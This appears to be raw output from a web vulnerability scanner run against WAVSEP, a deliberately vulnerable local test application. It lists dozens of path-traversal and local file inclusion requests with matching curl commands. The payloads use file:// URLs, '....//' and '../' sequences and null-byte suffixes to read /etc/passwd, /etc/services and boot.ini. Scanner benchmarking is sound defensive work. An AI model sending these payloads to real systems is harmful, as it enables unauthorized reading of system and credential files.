Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

